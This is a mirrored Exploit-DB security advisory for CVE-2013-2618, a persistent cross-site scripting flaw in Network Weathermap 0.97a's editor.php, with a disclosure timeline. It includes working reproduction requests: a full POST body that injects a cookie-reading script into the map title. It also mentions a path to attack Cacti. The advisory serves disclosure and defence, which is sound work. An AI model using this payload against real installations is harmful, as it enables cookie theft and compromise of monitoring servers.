Network Weathermap 0.97a – ‘editor.php’ Persistent Cross-Site Scripting

• Exploit Database
• 18 阅读

• 作者： Daniel Ricardo dos Santos
  日期： 2013-04-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24913/

• Network Weathermap 0.97a - Persistent XSS
  Earlier versions are also possibly vulnerable.
  
  INFORMATION
  
  Product: Network Weathermap 0.97a
  Remote-exploit: yes
  Vendor-URL: http://www.network-weathermap.com/
  
  Discovered by: Daniel Ricardo dos Santos
  CVE Request - 15/03/2013
  CVE Assign - 18/03/2013
  CVE Number - CVE-2013-2618
  Vendor notification - 18/03/2013
  Vendor reply - No reply
  Public disclosure - 01/04/2013
  
  OVERVIEW
  
  Network Weathermap 0.97a is vulnerable to a persistent XSS when displaying
  available files.
  
  INTRODUCTION
  
  Network Weathermap is a network visualisation tool, to take data you
  already have and show you an overview of your network in map form.
  Support is built in for RRD, MRTG (RRD and old log-format), and
  tab-delimited text files. Other sources are via plugins or external scripts.
  
  VULNERABILITY DESCRIPTION
  
  The vulnerability happens when a user injects HTML and Javascript into the
  title of a map in editor.php. This title is later shown to the user when
  listing the files in editor.php?action=newfile
  
  Besides the title, other fields also allow an attacker to upload malicious
  PHP code to a webserver, which can later be executed if the attacker has
  direct acess to that file.
  
  This application is often used as a plugin for Cacti. The vulnerability can
  be exploited in this mode as well, in
  weathermap-cacti-plugin-mgmt.php?action=viewconfig&file=<affected_file> and
  it can be used to exploit Cacti.
  
  To test it, simply create a map or edit an existing one:
  GET editor.php?mapname=test&action=newmap
  
  Then edit the map title with the payload:
  POST editor.php
  plug=0&mapname=test&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&link_commentin=&link_commentposin=95&link_commentout=&link_commentposout=5&map_title=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&map_legend=Traffic+Load&map_stamp=Created%3A+%25b+%25d+%25Y+%25H%3A%25M%3A%25S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=&editorsettings_showvias=0&editorsettings_showrelative=0&editorsettings_gridsnap=NO
  
  Then display the titles:
  GET editor.php
  
  VERSIONS AFFECTED
  
  Tested with version 0.97a (current release) but earlier versions are
  possibly vulnerable.
  
  SOLUTION
  
  There is no official patch currently available.
  
  NOTES
  
  The Common Vulnerabilities and Exposures (CVE) project has assigned the
  name CVE-2013-2618 to this issue. This is a candidate for inclusion in
  the CVE list (http://cve.mitre.org), which standardizes names for
  security problems.
  
  CREDITS
  
  Daniel Ricardo dos Santos
  SEC+ Information Security Company - http://www.secplus.com.br/